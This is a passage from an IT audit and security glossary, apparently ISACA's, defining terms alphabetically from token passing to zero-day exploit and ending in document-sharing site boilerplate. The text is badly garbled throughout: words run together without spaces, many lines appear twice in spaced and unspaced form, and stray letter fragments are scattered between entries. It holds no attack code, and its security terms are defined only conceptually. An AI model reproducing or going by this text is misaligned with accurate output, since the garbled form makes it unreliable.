nomoreframestosendorreachesthetimelimit,ittransmitsthetoken.Tokenpassing
preventsdatacollisionsthatcanoccurwhentwocomputersbegintransmittingatthesame
time.
Tolerableerror Themaximumerrorinthepopulationthatprofessionalsarewillingtoacceptandstillconclude p p p g p
thatthetestobjectivehasbeenachieved.Forsubstantivetests,tolerableerrorisrelatedto
professionalsjudgementaboutmateriality.Incompliancetests,itisthemaximumrateof
deviationfromaprescribedcontrolprocedurethattheprofessionalsarewillingtoaccept
Toplevel
management
Thehighestlevelofmanagementintheenterprise,responsiblefordirectionandcontrolofthe
enterpriseasawhole(suchasdirector,generalmanager,partner,chiefofficerandexecutive
manager)
Topology Thephysicallayoutofhowcomputersarelinkedtogether
ScopeNote:Examplesoftopologyincludering,starandbus.
Totalcostof
ownership(TCO)
Includestheoriginalcostofthecomputerplusthecostof:software,hardwareandsoftware
upgrades,maintenance,technicalsupport,training,andcertainactivitiesperformedbyusers
Transaction Businesseventsorinformationgroupedtogetherbecausetheyhaveasingleorsimilarpurpose
ScopeNote:Typically,atransactionisappliedtoacalculationoreventthatthenresultsinthe
updatingofaholdingormasterfile.
Transaction log A manual or automated log of all updates to data files and databases Transactionlog Amanualorautomatedlogofallupdatestodatafilesanddatabases
Transaction
protection
Alsoknownas"automatedremotejournalingofredologs,"adatarecoverystrategythatis
similartoelectronicvaultingexceptthatinsteadoftransmittingseveraltransactionbatches
daily,thearchivelogsareshippedastheyarecreated
TransmissionControl
Protocol(TCP)
AconnectionbasedInternetprotocolthatsupportsreliabledatatransferconnections
Scope Note: Packet data are verified using checksums and retransmitted if they are missing or ScopeNote:Packetdataareverifiedusingchecksumsandretransmittediftheyaremissingor
corrupted.Theapplicationplaysnopartinvalidatingthetransfer.
TransmissionControl
Protocol/Internet
Protocol(TCP/IP)
ProvidesthebasisfortheInternet;asetofcommunicationprotocolsthatencompassmedia
access,packettransport,sessioncommunication,filetransfer,electronicmail(email),
terminalemulation,remotefileaccessandnetworkmanagement
Term Definition
Transparency Referstoanenterprisesopennessaboutitsactivitiesandisbasedonthefollowingconcepts:
Howthemechanismfunctionsiscleartothosewhoareaffectedbyorwanttochallenge
governancedecisions.
Acommonvocabularyhasbeenestablished.
Relevantinformationisreadilyavailable.
Scope Note: Transparency and stakeholder trust are directly related; the more transparency in ScopeNote:Transparencyandstakeholdertrustaredirectlyrelated;themoretransparencyin
thegovernanceprocess,themoreconfidenceinthegovernance.
TransportLayer
Security(TLS)
AprotocolthatprovidescommunicationsprivacyovertheInternet.Theprotocolallows
client/serverapplicationstocommunicateinawaythatisdesignedtopreventeavesdropping,
tampering,ormessageforgery.(RFC2246)
ScopeNote:TransportLayerSecurity(TLS)iscomposedoftwolayers:theTLSRecordProtocol
andtheTLSHandshakeProtocol.TheTLSRecordProtocolprovidesconnectionsecuritywith
someencryptionmethodsuchastheDataEncryptionStandard(DES).TheTLSRecordProtocol
canalsobeusedwithoutencryption.TheTLSHandshakeProtocolallowstheserverandclient
toauthenticateeachotherandtonegotiateanencryptionalgorithmandcryptographickeys
before data is exchanged.
Trapdoor Unauthorizedelectronicexit,ordoorway,outofanauthorizedcomputerprogramintoasetof
maliciousinstructionsorprograms
TripleDES(3DES) AblockciphercreatedfromtheDataEncryptionStandard(DES)cipherbyusingitthreetimes
Trojanhorse Purposefullyhiddenmaliciousordamagingcodewithinanauthorizedcomputerprogram
lik i h d li h l b h b j ScopeNote:Unlikeviruses,theydonotreplicatethemselves,buttheycanbejustas
destructivetoasinglecomputer.
Trustedprocess Aprocesscertifiedassupportingasecuritygoal
Trustedsystem Asystemthatemployssufficienthardwareandsoftwareassurancemeasurestoallowtheir
useforprocessingarangeofsensitiveorclassifiedinformation
Tunnel The paths that the encapsulated packets follow in an Internet virtual private network (VPN) Tunnel ThepathsthattheencapsulatedpacketsfollowinanInternetvirtualprivatenetwork(VPN)
Tunnelmode Usedtoprotecttrafficbetweendifferentnetworkswhentrafficmusttravelthrough
intermediateoruntrustednetworks.TunnelmodeencapsulatestheentireIPpacketwithand
AHorESPheaderandanadditionalIPheader.
Term Definition
Tunneling Commonlyusedtobridgebetweenincompatiblehosts/routersortoprovideencryption,a
method by which one network protocol encapsulates another protocol within itself methodbywhichonenetworkprotocolencapsulatesanotherprotocolwithinitself
ScopeNote:WhenprotocolAencapsulatesprotocolB,aprotocolAheaderandoptional
tunnelingheadersareappendedtotheoriginalprotocolBpacket.ProtocolAthenbecomes
thedatalinklayerofprotocolB.ExamplesoftunnelingprotocolsincludeIPSec,Pointtopoint
ProtocolOverEthernet(PPPoE)andLayer2TunnelingProtocol(L2TP).
Tuple Aroworrecordconsistingofasetofattributevaluepairs(columnorfield)inarelationaldata
structure
Twistedpair Alowcapacitytransmissionmedium;apairofsmall,insulatedwiresthataretwistedaround
eachothertominimizeinterferencefromotherwiresinthecable
Twofactor Theuseoftwoindependentmechanismsforauthentication,(e.g.,requiringasmartcardanda
authentication
p , ( g , q g
password)typicallythecombinationofsomethingyouknow,areorhave
Uncertainty Thedifficultyofpredictinganoutcomeduetolimitedknowledgeofallcomponents
Unicode Astandardforrepresentingcharactersasintegers
ScopeNote:Unicodeuses16bits,whichmeansthatitcanrepresentmorethan65,000unique
characters;thisisnecessaryforlanguagessuchasChineseandJapanese.
Uniformresource
locator(URL)
Thestringofcharactersthatformawebaddress
Unittesting Atestingtechniquethatisusedtotestprogramlogicwithinaparticularprogramormodule
ScopeNote:Thepurposeofthetestistoensurethattheinternaloperationoftheprogram
f d f f h f h l performsaccordingtospecification.Itusesasetoftestcasesthatfocusonthecontrol
structureoftheproceduraldesign.
Universaldescription,
discoveryand
integration(UDDI)
Awebbasedversionofthetraditionaltelephonebook'syellowandwhitepagesenabling
businessestobepubliclylistedinpromotinggreaterecommerceactivities
UniversalSerialBUS
(USB)
Anexternalbusstandardthatprovidescapabilitiestotransferdataatarateof12Mbps
ScopeNote:AUSBportcanconnectupto127peripheraldevices.
UNIX Amultiuser,multitaskingoperatingsystemthatisusedwidelyasthemastercontrolprogram
in workstations and especially servers inworkstationsandespeciallyservers
Term Definition
Untrustworthyhost Ahostisreferredtoasuntrustworthybecauseitcannotbeprotectedbythefirewall;
therefore hosts on trusted networks can place only limited trust in it therefore,hostsontrustednetworkscanplaceonlylimitedtrustinit.
ScopeNote:Tothebasicborderfirewall,addahostthatresidesonanuntrustednetwork
wherethefirewallcannotprotectit.Thathostisminimallyconfiguredandcarefullymanaged
tobeassecureaspossible.Thefirewallisconfiguredtorequireincomingandoutgoingtraffic
togothroughtheuntrustworthyhost.
Uploading Theprocessofelectronicallysendingcomputerizedinformationfromonecomputertoanother Uploading Theprocessofelectronicallysendingcomputerizedinformationfromonecomputertoanother
computer
ScopeNote:Whenuploading,mostoftenthetransferisfromasmallercomputertoalarger
one.
Userawareness Atrainingprocessinsecurityspecificissuestoreducesecurityproblems;usersareoftenthe
weakestlinkinthesecuritychain. y
UserDatagram
Protocol(UDP)
AconnectionlessInternetprotocolthatisdesignedfornetworkefficiencyandspeedatthe
expenseofreliability
ScopeNote:Adatarequestbytheclientisservedbysendingpacketswithouttestingtoverify
whethertheyactuallyarriveatthedestination,notwhethertheywerecorruptedintransit.It
isuptotheapplicationtodeterminethesefactorsandrequestretransmissions. p pp q
Userinterface
impersonation
Canbeapopupadthatimpersonatesasystemdialog,anadthatimpersonatesasystem
warning,oranadthatimpersonatesanapplicationuserinterfaceinamobiledevice.
Usermode Usedfortheexecutionofnormalsystemactivities
Userprovisioning Aprocesstocreate,modify,disableanddeleteuseraccountsandtheirprofilesacrossIT
i f d b i li i infrastructureandbusinessapplications
Utilityprograms Specializedsystemsoftwareusedtoperformparticularcomputerizedfunctionsandroutines
thatarefrequentlyrequiredduringnormalprocessing
ScopeNote:Examplesofutilityprogramsincludesorting,backingupanderasingdata.
Utility script A sequence of commands input into a single file to automate a repetitive and specific task Utilityscript Asequenceofcommandsinputintoasinglefiletoautomatearepetitiveandspecifictask
ScopeNote:Theutilityscriptisexecuted,eitherautomaticallyormanually,toperformthe
task.InUNIX,theseareknownasshellscripts.
Utilitysoftware Computerprogramsprovidedbyacomputerhardwaremanufacturerorsoftwarevendorand
used in running the system usedinrunningthesystem
ScopeNote:Thistechniquecanbeusedtoexamineprocessingactivities;totestprograms,
systemactivitiesandoperationalprocedures;toevaluatedatafileactivity;and,toanalyzejob
accountingdata.
Vaccine Aprogramdesignedtodetectcomputerviruses
Term Definition
ValIT ThestandardframeworkforenterprisestoselectandmanageITrelatedbusinessinvestments
and IT assets by means of investment programs such that they deliver the optimal value to the andITassetsbymeansofinvestmentprogramssuchthattheydelivertheoptimalvaluetothe
enterprise
BasedonCOBIT.
Validitycheck Programmedcheckingofdatavalidityinaccordancewithpredeterminedcriteria
Value Therelativeworthorimportanceofaninvestmentforanenterprise,asperceivedbyitskey
stakeholders, expressed as total life cycle benefits net of related costs, adjusted for risk and (in stakeholders,expressedastotallifecyclebenefitsnetofrelatedcosts,adjustedforriskand(in
thecaseoffinancialvalue)thetimevalueofmoney
Valuecreation Themaingovernanceobjectiveofanenterprise,achievedwhenthethreeunderlying
objectives(benefitsrealization,riskoptimizationandresourceoptimization)areallbalanced
Valueaddednetwork
(VAN)
Adatacommunicationnetworkthataddsprocessingservicessuchaserrorcorrection,data
translationand/orstoragetothebasicfunctionoftransportingdata
Variablesampling Asamplingtechniqueusedtoestimatetheaverageortotalvalueofapopulationbasedona
sample;astatisticalmodelusedtoprojectaquantitativecharacteristic,suchasamonetary
amount
Verification Checksthatdataareenteredcorrectly
Verticaldefensein
depth
Controlsareplacedatdifferentsystemlayershardware,operatingsystem,application,
databaseoruserlevels
Virtuallocalarea
network(VLAN)
LogicalsegmentationofaLANintodifferentbroadcastdomains
ScopeNote:AVLANissetupbyconfiguringportsonaswitch,sodevicesattachedtothese
portsmaycommunicateasiftheywereattachedtothesamephysicalnetworksegment,
althoughthedevicesarelocatedondifferentLANsegments.AVLANisbasedonlogicalrather
thanphysicalconnections.
Virtualorganizations Organizationthathasnoofficialphysicalsitepresenceandismadeupofdiverse,
geographicallydispersedormobileemployees
Virtualprivate
network(VPN)
Asecureprivatenetworkthatusesthepublictelecommunicationsinfrastructuretotransmit
data
ScopeNote:Incontrasttoamuchmoreexpensivesystemofownedorleasedlinesthatcan
onlybeusedbyonecompany,VPNsareusedbyenterprisesforbothextranetsandwideareas
ofintranets.Usingencryptionandauthentication,aVPNencryptsalldatathatpassbetween
twoInternetpoints,maintainingprivacyandsecurity.
Virtual private A system used to establish VPN tunnels and handle large numbers of simultaneous Virtualprivate
network(VPN)
concentrator
AsystemusedtoestablishVPNtunnelsandhandlelargenumbersofsimultaneous
connections.Thissystemprovidesauthentication,authorizationandaccountingservices.
Virtualization Theprocessofaddinga"guestapplication"anddataontoa"virtualserver,"recognizingthat
theguestapplicationwillultimatelypartcompanyfromthisphysicalserver
Term Definition
Virus Aprogramwiththeabilitytoreproducebymodifyingotherprogramstoincludeacopyofitself
ScopeNote:Avirusmaycontaindestructivecodethatcanmoveintomultipleprograms,data
filesordevicesonasystemandspreadthroughmultiplesystemsinanetwork.
Virussignaturefile Thefileofviruspatternsthatarecomparedwithexistingfilestodeterminewhethertheyare
infected with a virus or worm infectedwithavirusorworm
Voicemail Asystemofstoringmessagesinaprivaterecordingmediumwhichallowsthecalledpartyto
laterretrievethemessages
VoiceoverInternet
Protocol(VoIP)
AlsocalledIPTelephony,InternetTelephonyandBroadbandPhone,atechnologythatmakesit
possibletohaveavoiceconversationovertheInternetoroveranydedicatedInternetProtocol
(IP)networkinsteadofoverdedicatedvoicetransmissionlines
Volatiledata Datathatchangesfrequentlyandcanbelostwhenthesystem'spowerisshutdown g q y y p
Vulnerability Aweaknessinthedesign,implementation,operationorinternalcontrolofaprocessthat
couldexposethesystemtoadversethreatsfromthreatevents
Vulnerabilityanalysis Aprocessofidentifyingandclassifyingvulnerabilities
Vulnerabilityevent Anyeventduringwhichamaterialincreaseinvulnerabilityresults
Notethatthisincreaseinvulnerabilitycanresultfromchangesincontrolconditionsorfrom
changesinthreatcapability/force.
ScopeNote:FromJones,J.;"FAIRTaxonomy,"RiskManagementInsight,USA,2008
Vulnerabilityscanning Anautomatedprocesstoproactivelyidentifysecurityweaknessesinanetworkorindividual
system
W lk th h A th h d t ti l ti th t d t il h t f Walkthrough Athoroughdemonstrationorexplanationthatdetailseachstepofaprocess
Wardialer Softwarepackagesthatsequentiallydialtelephonenumbers,recordinganynumbersthat
answer
Warmsite Similartoahotsitebutnotfullyequippedwithallofthenecessaryhardwareneededfor
recovery
Waterfall
development
Alsoknownastraditionaldevelopment,aprocedurefocuseddevelopmentcyclewithformal
sign off at the completion of each level development signoffatthecompletionofeachlevel
Webhosting Thebusinessofprovidingtheequipmentandservicesrequiredtohostandmaintainfilesfor
oneormorewebsitesandprovidefastInternetconnectionstothosesites
ScopeNote:Mosthostingis"shared,"whichmeansthatwebsitesofmultiplecompaniesare
onthesameservertoshare/reducecosts.
Web page A viewable screen displaying information, presented through a web browser in a single view, Webpage Aviewablescreendisplayinginformation,presentedthroughawebbrowserinasingleview,
sometimesrequiringtheusertoscrolltoreviewtheentirepage
ScopeNote:Anenterprise'swebpagemaydisplaytheenterpriseslogo,provideinformation
abouttheenterprise'sproductsandservices,orallowacustomertointeractwiththe
enterpriseorthirdpartiesthathavecontractedwiththeenterprise.
Term Definition
Webserver UsingtheclientservermodelandtheWorldWideWeb'sHyperTextTransferProtocol(HTTP),
Web Server is a software program that serves web pages to users WebServerisasoftwareprogramthatserveswebpagestousers.
WebServices
DescriptionLanguage
(WSDL)
Alanguageformattedwithextensiblemarkuplanguage(XML)
Usedtodescribethecapabilitiesofawebserviceascollectionsofcommunicationendpoints
capableofexchangingmessages;WSDListhelanguageusedbyUniversalDescription,
DiscoveryandIntegration(UDDI).SeealsoUniversalDescription,DiscoveryandIntegration
(UDDI) (UDDI).
Website Consistsofoneormorewebpagesthatmayoriginateatoneormorewebservercomputers
ScopeNote:Apersoncanviewthepagesofawebsiteinanyorder,ashe/shewouldreada
magazine.
Wellknowports Wellknownports0through1023:ControlledandassignedbytheInternetAssigned p p g g y g
NumbersAuthority(IANA),andonmostsystemscanbeusedonlybysystem(orroot)
processesorbyprogramsexecutedbyprivilegedusers.Theassignedportsusethefirstportion
ofthepossibleportnumbers.Initially,theseassignedportswereintherange0255.Currently,
therangeforassignedportsmanagedbytheIANAhasbeenexpandedtotherange01023.
Whiteboxtesting Atestingapproachthatusesknowledgeofaprogram/modulesunderlyingimplementation
andcodeintervalstoverifyitsexpectedbehavior
Wideareanetwork
(WAN)
Acomputernetworkconnectingdifferentremotelocationsthatmayrangefromshort
distances,suchasafloororbuilding,toextremelylongtransmissionsthatencompassalarge
regionorseveralcountries
Wideareanetwork
(WAN)switch
AdatalinklayerdeviceusedforimplementingvariousWANtechnologiessuchas
asynchronoustransfermode,pointtopointframerelaysolutions,andintegratedservices
di i l k ( S ) digitalnetwork(ISDN).
ScopeNote:WANswitchesaretypicallyassociatedwithcarriernetworksprovidingdedicated
WANswitchingandrouterservicestoenterprisesviaT1orT3connections.
Term Definition
WiFiprotected
access (WAP)
Aclassofsystemsusedtosecurewireless(WiFi)computernetworks.
access(WAP)
ScopeNote:WPAwascreatedinresponsetoseveralseriousweaknessesthatresearchers
foundintheprevioussystem,WiredEquivalentPrivacy(WEP).WPAimplementsthemajority
oftheIEEE802.11istandard,andwasintendedasanintermediatemeasuretotaketheplace
ofWEPwhile802.11iwasprepared.WPAisdesignedtoworkwithallwirelessnetwork
interfacecards,butnotnecessarilywithfirstgenerationwirelessaccesspoints.WPA2
implements the full standard but will not work with some older network cards Both provide implementsthefullstandard,butwillnotworkwithsomeoldernetworkcards.Bothprovide
goodsecuritywithtwosignificantissues.First,eitherWPAorWPA2mustbeenabledand
choseninpreferencetoWEP;WEPisusuallypresentedasthefirstsecuritychoiceinmost
installationinstructions.Second,inthe"personal"mode,themostlikelychoiceforhomesand
smalloffices,apassphraseisrequiredthat,forfullsecurity,mustbelongerthanthetypicalsix
toeightcharacterpasswordsusersaretaughttoemploy.
WiFiProtected
Access(WPA)
Aclassofsystemsusedtosecurewireless(WiFi)computernetworks
ScopeNote:WPAwascreatedinresponsetoseveralseriousweaknessesthatresearchers
foundintheprevioussystem,WiredEquivalentPrivacy(WEP).WPAimplementsthemajority
oftheIEEE802.11istandard,andwasintendedasanintermediatemeasuretotaketheplace
ofWEPwhile802.11iwasprepared.WPAisdesignedtoworkwithallwirelessnetwork p p g
interfacecards,butnotnecessarilywithfirstgenerationwirelessaccesspoints.WPA2
implementsthefullstandard,butwillnotworkwithsomeoldernetworkcards.Bothprovide
goodsecuritywithtwosignificantissues.First,eitherWPAorWPA2mustbeenabledand
choseninpreferencetoWEP;WEPisusuallypresentedasthefirstsecuritychoiceinmost
installationinstructions.Second,inthe"personal"mode,themostlikelychoiceforhomesand
smalloffices,apassphraseisrequiredthat,forfullsecurity,mustbelongerthanthetypicalsix p p q y g yp
toeightcharacterpasswordsusersaretaughttoemploy.
WiFiprotected
accessII(WPA2)
Wirelesssecurityprotocolthatsupports802.11iencryptionstandardstoprovidegreater
security.ThisprotocolusesAdvancedEncryptionStandards(AES)andTemporalKeyIntegrity
Protocol(TKIP)forstrongerencryption.
WindowsNT AversionoftheWindowsoperatingsystemthatsupportspreemptivemultitasking
Wired Equivalent A scheme that is part of the IEEE 802 11 wireless networking standard to secure IEEE 802 11 WiredEquivalent
Privacy(WEP)
AschemethatispartoftheIEEE802.11wirelessnetworkingstandardtosecureIEEE802.11
wirelessnetworks(alsoknownasWiFinetworks)
ScopeNote:Becauseawirelessnetworkbroadcastsmessagesusingradio,itisparticularly
susceptibletoeavesdropping.WEPwasintendedtoprovidecomparableconfidentialitytoa
traditionalwirednetwork(inparticular,itdoesnotprotectusersofthenetworkfromeach
other) hence the name Several serious weaknesses were identified by cryptanalysts and WEP other),hencethename.Severalseriousweaknesseswereidentifiedbycryptanalysts,andWEP
wassupersededbyWiFiProtectedAccess(WPA)in2003,andthenbythefullIEEE802.11i
standard(alsoknownasWPA2)in2004.Despitetheweaknesses,WEPprovidesalevelof
securitythatcandetercasualsnooping.
Term Definition
Wirelesscomputing Theabilityofcomputingdevicestocommunicateinaformtoestablishalocalareanetwork
(LAN) without cabling infrastructure (wireless) and involves those technologies converging (LAN)withoutcablinginfrastructure(wireless),andinvolvesthosetechnologiesconverging
aroundIEEE802.11and802.11bandradiobandservicesusedbymobiledevices
Wirelesslocalarea
network(WLAN)
Twoormoresystemsnetworkedusingawirelessdistributionmethod
Wiretapping Thepracticeofeavesdroppingoninformationbeingtransmittedovertelecommunications
links links
WorldWideWeb
(WWW)
AsubnetworkoftheInternetthroughwhichinformationisexchangedbytext,graphics,audio
andvideo
WorldWideWeb
Consortium(W3C)
Aninternationalconsortiumfoundedin1994ofaffiliatesfrompublicandprivateorganizations
involvedwiththeInternetandtheweb
ScopeNote:TheW3C'sprimarymissionistopromulgateopenstandardstofurtherenhance ScopeNote:TheW3C sprimarymissionistopromulgateopenstandardstofurtherenhance
theeconomicgrowthofInternetwebservicesglobally.
Worm Aprogrammednetworkattackinwhichaselfreplicatingprogramdoesnotattachitselfto
programs,butratherspreadsindependentlyofusersaction
Writeblocker Adevicesthatallowstheacquisitionofinformationonadrivewithoutcreatingthepossibility
ofaccidentallydamagingthedrive
Writeprotect Theuseofhardwareorsoftwaretopreventdatatobeoverwrittenordeleted
X.25 Aprotocolforpacketswitchingnetworks
X.25Interface Aninterfacebetweendataterminalequipment(DTE)anddatacircuitterminatingequipment
(DCE)forterminalsoperatinginthepacketmodeonsomepublicdatanetworks
X.500 Astandardthatdefineshowglobaldirectoriesshouldbestructured
S N X 00 di i hi hi l i h diff l l f h f ScopeNote:X.500directoriesarehierarchicalwithdifferentlevelsforeachcategoryof
information,suchascountry,stateandcity.
Zerodayexploit Avulnerabilitythatisexploitedbeforethesoftwarecreator/vendorisevenawareofit's
existence
Revised1June2014

Glossary

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Glossary

Uploaded by

Copyright:

Available Formats

ISACAGlossaryofTerms

You might also like